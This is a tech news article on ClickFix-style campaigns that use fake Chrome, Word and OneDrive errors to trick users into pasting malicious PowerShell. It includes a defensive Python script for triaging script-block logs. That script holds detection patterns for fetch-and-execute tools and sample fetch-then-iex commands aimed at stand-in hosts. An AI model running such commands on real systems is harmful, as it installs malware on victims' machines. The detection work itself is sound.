
Threat Actors Are Now Using Fake Google Chrome, Microsoft Word, and OneDrive to Target Users

by Krishi Chowdhary, from Techreport (#6NMCH)
  • Hackers are using fake Google Chrome, Microsoft Word, and OneDrive error messages to get payloads installed on victims' devices.
  • Multiple threat actors are using the trick: they show users fake error messages that appear to come from these apps and talk them into running commands that download malware.
  • The worst part is that Windows is still unable to detect or block these attacks. Until it can, the danger persists.


Hackers around the world are constantly coming up with new ways to trick users. In a first of its kind, malicious actors are now showing victims fake error messages that appear to come from Google Chrome, Microsoft Word, and OneDrive.

The worst part is that this is not a single operation: multiple threat actors have been found using this trick.

  • For instance, TA571, a threat actor known for high-volume email campaigns that trick users into downloading malware, was found using this method.
  • Similarly, the threat actors behind ClearFake and a new attack cluster called ClickFix were also found to be part of this malicious operation.
How Exactly Does It Work?

According to a report by Proofpoint, the payloads used in these attacks are NetSupport, Matanbuchus, Amadey Loader, DarkGate, XMRig, a clipboard hijacker, and Lumma Stealer.

As for the methodology, there are three ways in which these attacks are being carried out. Let's look at each one of them.

Method #1 - ClickFix Campaign

The first case is associated with the ClickFix campaign.

  • Here, the threat actors present users with an error message, delivered by email or as an overlay on a website, and then convince them to download their browser's latest update.
  • However, the link leads to a fake update, which is then used to install malware on the victim's device.

In some cases, users are instead asked to open "Windows PowerShell (Admin)" and paste a piece of code provided by the hackers. The end result is the same: the pasted command fetches and runs the malware.

Method #2 - Root Certificate

Alternatively, the hackers show users a warning saying that there was trouble displaying the webpage and that the user needs to install a "root certificate".

To do this, users are directed to copy a PowerShell script to the Windows clipboard and run it in an elevated (Admin) console. The script displays fake progress messages while silently downloading information-stealing malware onto the device.


Method #3 - Fake Email

In the third method, threat actors send emails that look like Microsoft Word document prompts and ask users to download something called "Word Online", an extension that will supposedly help them view the document correctly.

The error message also offers options such as "How to fix" and "Auto-fix", which supply commands that will apparently repair whatever error has been displayed if pasted into PowerShell. In reality, running them hands the user's system over to malware.
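All three methods end the same way: the victim pastes an attacker-supplied PowerShell command into an elevated console, so the command text itself is the most reliable artifact to hunt for. The following added example (not code from the article or from Proofpoint) triages PowerShell script-block log records, the ScriptBlockText that Windows writes as Event ID 4104 when script block logging is enabled, for the combination seen in these lures: a reassuring decoy message, a fetch from a remote host, in-memory execution of what was fetched, and flags that hide or unlock the console. It also decodes any -EncodedCommand argument before scoring, since the page notes the commands may be supplied pre-packaged. The records, host and user names, and the example.invalid hostnames are constructed, and the pipe-separated field layout is an assumption rather than a Windows log format.

```python
"""Triage PowerShell script-block log records for ClickFix-style "paste this
to fix it" commands. Added example; the records below are constructed and
the pipe-separated layout is an assumption, not a Windows log format."""
import base64
import re
from dataclasses import dataclass, field

# Indicator families that the campaigns described above combine: a decoy
# message to reassure the victim, a fetch from a remote host, in-memory
# execution of what was fetched, and flags that hide or unlock the console.
INDICATORS = {
    "decoy_message": re.compile(
        r"(Write-Host|MessageBox)[^;]*(fix|updat|certificat|verif)", re.I),
    "remote_fetch": re.compile(
        r"\b(iwr|irm|curl|Invoke-WebRequest|Invoke-RestMethod|"
        r"DownloadString|DownloadFile|Net\.WebClient)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "evasion": re.compile(
        r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|"
        r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}|FromBase64String)", re.I),
}
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text: str) -> str:
    """Append the UTF-16LE payload of any -EncodedCommand argument so the
    indicators are matched against what the shell will actually run."""
    decoded = []
    for m in ENC_ARG.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True)
                           .decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; keep the raw text only
    return text + "\n" + "\n".join(decoded) if decoded else text


@dataclass
class Finding:
    script_block: str
    hits: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.hits)

    @property
    def flagged(self) -> bool:
        # Fetch-then-execute is the core of the attack and is enough on its
        # own; otherwise require three independent indicator families.
        return ({"remote_fetch", "in_memory_exec"} <= set(self.hits)
                or self.score >= 3)


def triage(script_block: str) -> Finding:
    """Score one ScriptBlockText value against the indicator families."""
    text = decode_encoded_commands(script_block)
    finding = Finding(script_block)
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            finding.hits.append(name)
    return finding


def triage_log(records):
    """Parse 'timestamp|host|user|ScriptBlockText' records (assumed layout)
    and return (timestamp, host, user, Finding) for the flagged ones."""
    flagged = []
    for record in records:
        parts = record.split("|", 3)  # ScriptBlockText may itself contain '|'
        if len(parts) != 4:
            continue
        ts, host, user, block = parts
        finding = triage(block)
        if finding.flagged:
            flagged.append((ts, host, user, finding))
    return flagged


def _encoded(ps: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed records: a routine admin command, a ClickFix-style root
# certificate lure, a browser-update lure hidden behind -enc, and a
# legitimate scripted download that must not be flagged.
SAMPLE_LOG = [
    "2024-06-17T09:01:02|WS01|alice|Get-Service | Where-Object Status -eq 'Running'",
    "2024-06-17T09:05:10|WS01|alice|powershell -w hidden -ep bypass -c "
    "\"Write-Host 'Installing root certificate...'; "
    "iex (iwr 'https://update.example.invalid/fix.txt' -UseBasicParsing).Content\"",
    "2024-06-17T09:07:44|WS02|bob|powershell -enc " + _encoded(
        "Write-Host 'Updating Chrome'; "
        "iex (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/u')"),
    "2024-06-17T09:12:31|WS03|carol|Invoke-WebRequest -Uri "
    "https://reports.example.invalid/r.csv -OutFile C:\\reports\\r.csv",
]

if __name__ == "__main__":
    for ts, host, user, finding in triage_log(SAMPLE_LOG):
        print(f"{ts} {host} {user}: score={finding.score} hits={finding.hits}")
```

The scoring deliberately keys on the combination rather than on any single command: a plain `Invoke-WebRequest -OutFile` is routine administration and is left alone, while a fetch piped straight into `iex` is flagged on its own. Script block logging has to be turned on for these records to exist at all; without it, the pasted command leaves only the console history behind.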

How Effective Are These Tricks?

The biggest problem with these tricks is that Windows is still unable to detect and block them. The attack chain also gives conventional defenses little to catch: no malicious attachment or download is served up front, and the victim runs the pasted command in an elevated PowerShell console themselves, with the payload fetched only after that. Until this changes, users remain vulnerable.

Also, although the attack methods depend heavily on social engineering, they are being executed so convincingly that users genuinely believe something is wrong with their system and needs to be fixed. This means the attacks are indeed proving effective.

The post Threat Actors Are Now Using Fake Google Chrome, Microsoft Word, and OneDrive to Target Users appeared first on The Tech Report.
